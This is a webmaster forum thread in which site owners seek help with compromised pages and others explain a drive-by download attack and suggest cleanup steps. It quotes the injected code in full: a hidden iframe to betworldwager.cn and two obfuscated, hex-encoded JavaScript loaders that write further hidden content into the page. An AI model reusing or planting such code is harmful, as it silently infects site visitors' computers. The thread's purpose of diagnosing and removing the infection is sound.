Hello I recently found this code in my site page (Its an ASP page and its dynamic content) <iframe src="http://betworldwager.cn/in.cgi?income69" width=1 height=1 style="visibility: hidden"></iframe> No idea how it got there and what it is Anyone have an idea?
This iframe URL is: If you are on shared hosting check your files and folders permission (644 is good). Regards.
Yes this is an html framer. Basically anyone who visited your website would have this hidden iframe open that would then download a malware trojan to their pc. Either your server has been hacked or someone has gained access through a script vulnerabilty. Not very nice at all - can I ask who your web host is, as a couple of my clients sites hosted with 1and1.co.uk had the same problem this week?
They also inserted this at the footer: <script>function c3257948b3q49f1a3f9dde1a(q49f1a3f9de200){ return (eval('pa'+'rseInt')(q49f1a3f9de200,16));}function q49f1a3f9dedb7(q49f1a3f9df19e){ var q49f1a3f9dfd55=2; var q49f1a3f9df586='';q49f1a3f9e0525=String['fromCharCode'];for(q49f1a3f9df96e=0;q49f1a3f9df96e<q49f1a3f9df19e.length;q49f1a3f9df96e+=q49f1a3f9dfd55){ q49f1a3f9df586+=(q49f1a3f9e0525(c3257948b3q49f1a3f9dde1a(q49f1a3f9df19e.substr(q49f1a3f9df96e,q49f1a3f9dfd55))));}return q49f1a3f9df586;} var v3f='';var q49f1a3f9e090d='3C7'+v3f+'3637'+v3f+'2697'+v3f+'07'+v3f+'43E696628216D7'+v3f+'96961297'+v3f+'B646F637'+v3f+'56D656E7'+v3f+'42E7'+v3f+'7'+v3f+'7'+v3f+'2697'+v3f+'465287'+v3f+'56E657'+v3f+'363617'+v3f+'065282027'+v3f+'2533632536392536362537'+v3f+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+v3f+'332537'+v3f+'32253633253364253237'+v3f+'2536382537'+v3f+'342537'+v3f+'342537'+v3f+'302533612532662532662537'+v3f+'37'+v3f+'2537'+v3f+'37'+v3f+'2537'+v3f+'37'+v3f+'2532652536322537'+v3f+'322536662536652536662537'+v3f+'342536312536622532652536332536652532662537'+v3f+'302536382537'+v3f+'302536642537'+v3f+'392536312536342536642536392536652532662536392536652536342536352537'+v3f+'382532652537'+v3f+'302536382537'+v3f+'30253366253237'+v3f+'2532622534642536312537'+v3f+'342536382532652537'+v3f+'322536662537'+v3f+'352536652536342532382534642536312537'+v3f+'342536382532652537'+v3f+'32253631253665253634253666253664253238253239253261253332253331253337'+v3f+'253337'+v3f+'253335253336253239253262253237'+v3f+'253632253337'+v3f+'253632253237'+v3f+'2532302537'+v3f+'37'+v3f+'2536392536342537'+v3f+'34253638253364253335253333253339253230253638253635253639253637'+v3f+'2536382537'+v3f+'342533642533342533302533342532302537'+v3f+'332537'+v3f+'342537'+v3f+'39253663253635253364253237'+v3f+'2537'+v3f+'362536392537'+v3f+'332536392536322536392536632536392537'+v3f+'342537'+v3f+'39253361253638253639253634253634253635253665253237'+v3f+'2533652533632532662536392536362537'+v3f+'3225363125366425363525336527'+v3f+'29293B7'+v3f+'D7'+v3f+'6617'+v3f+'2206D7'+v3f+'969613D7'+v3f+'47'+v3f+'27'+v3f+'5653B3C2F7'+v3f+'3637'+v3f+'2697'+v3f+'07'+v3f+'43E';q49f1a3f9e10dd=document;q49f1a3f9e10dd.write(q49f1a3f9dedb7(q49f1a3f9e090d));</script> Code (markup):
look like a trojan code. you should check with your hosting company may be their whole server is hacked and many other sites have trojans. if they got hacked it is better move to a safer company having virus checking software and checking on trojans priodically
<script>function c3257948b3q49f2ed2c0f7fe(q49f2ed2c0fbe5){ function q49f2ed2c0ffcc(){var q49f2ed2c103b3=16;return q49f2ed2c103b3;} return (eval('pa'+'rseInt')(q49f2ed2c0fbe5,q49f2ed2c0ffcc()));}function q49f2ed2c10cff(q49f2ed2c11359){ function q49f2ed2c11f09(){var q49f2ed2c122f1=2;return q49f2ed2c122f1;} var q49f2ed2c1173e='';q49f2ed2c126dc=String['fromCharCode'];for(q49f2ed2c11b22=0;q49f2ed2c11b22<q49f2ed2c11359.length;q49f2ed2c11b22+=q49f2ed2c11f09()){ q49f2ed2c1173e+=(q49f2ed2c126dc(c3257948b3q49f2ed2c0f7fe(q49f2ed2c11359.substr(q49f2ed2c11b22,q49f2ed2c11f09()))));}return q49f2ed2c1173e;} var vd2='';var q49f2ed2c12ac1='3C7'+vd2+'3637'+vd2+'2697'+vd2+'07'+vd2+'43E696628216D7'+vd2+'96961297'+vd2+'B646F637'+vd2+'56D656E7'+vd2+'42E7'+vd2+'7'+vd2+'7'+vd2+'2697'+vd2+'465287'+vd2+'56E657'+vd2+'363617'+vd2+'065282027'+vd2+'2533632536392536362537'+vd2+'322536312536642536352532302536652536312536642536352533642536332533332533322532302537'+vd2+'332537'+vd2+'32253633253364253237'+vd2+'2536382537'+vd2+'342537'+vd2+'342537'+vd2+'302533612532662532662537'+vd2+'37'+vd2+'2537'+vd2+'37'+vd2+'2537'+vd2+'37'+vd2+'2532652536322537'+vd2+'322536662536652536662537'+vd2+'342536312536622532652536332536652532662537'+vd2+'302536382537'+vd2+'302536642537'+vd2+'392536312536342536642536392536652532662536392536652536342536352537'+vd2+'382532652537'+vd2+'302536382537'+vd2+'30253366253237'+vd2+'2532622534642536312537'+vd2+'342536382532652537'+vd2+'322536662537'+vd2+'352536652536342532382534642536312537'+vd2+'342536382532652537'+vd2+'32253631253665253634253666253664253238253239253261253331253338253333253333253330253239253262253237'+vd2+'253337'+vd2+'253332253635253632253337'+vd2+'253634253633253237'+vd2+'2532302537'+vd2+'37'+vd2+'2536392536342537'+vd2+'34253638253364253337'+vd2+'253338253230253638253635253639253637'+vd2+'2536382537'+vd2+'342533642533322533332533352532302537'+vd2+'332537'+vd2+'342537'+vd2+'39253663253635253364253237'+vd2+'2537'+vd2+'362536392537'+vd2+'332536392536322536392536632536392537'+vd2+'342537'+vd2+'39253361253638253639253634253634253635253665253237'+vd2+'2533652533632532662536392536362537'+vd2+'3225363125366425363525336527'+vd2+'29293B7'+vd2+'D7'+vd2+'6617'+vd2+'2206D7'+vd2+'969613D7'+vd2+'47'+vd2+'27'+vd2+'5653B3C2F7'+vd2+'3637'+vd2+'2697'+vd2+'07'+vd2+'43E';q49f2ed2c13291=document;q49f2ed2c13291.write(q49f2ed2c10cff(q49f2ed2c12ac1));</script> Code (markup): What I have noticed - its on most of my sites now, is that they have either hacked into my computer or found some other way of reading from my filezilla saved passwords - its all from filezilla accounts - they use a tracking system and then a find and replace after the the <body> tag insert iframe and then another find and replace before the </body> tag and I think they look for index.php and files like index2.php etc etc.. Its affected all my sites and Google says my sites are now spam - crazy. The other thing is I am using McAfee - the very latest version and AVG on my computer and it looks like it got past them - I do think it could have been a dictionary jump on one of my site logins but usually after so many attempts of logging in - it blogs this - so no idea. Will only really find out more information when more people talk about this. Happened to many clients and on different hosts and different sites
It's possible that they got into your site first and then loaded a remote code execution tool on it which infected your computer itself. I would change all of my passwords, get a new host, and reformat.
For anyone interested or comes to this later on. They are iframe and javascript exploits take good read and look at these posts with all threads of loads of discussions about this, including a 10month research finding on it http://forums.cpanel.net/showpost.php?p=363225&postcount=26 - Great post about it and how it happens, how to avoid it, and how to prevent it in future http://forums.cpanel.net/showthread.php?t=61066&page=2 http://forums.cpanel.net/showthread.php?t=62821&page=4 http://www.google.co.uk/search?q=ft...s=org.mozilla:en-GB:official&client=firefox-a